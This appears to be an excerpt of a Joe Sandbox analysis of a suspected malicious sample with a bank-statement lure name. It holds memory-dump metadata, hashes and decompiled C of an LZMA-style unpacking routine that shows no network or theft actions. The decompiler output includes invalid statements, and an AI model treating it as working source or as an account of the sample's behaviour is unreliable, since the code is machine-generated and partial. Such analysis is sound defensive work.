0x004075fa
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00407524
0x00000000
0x00407399

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									__ebx = __edx + 1;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
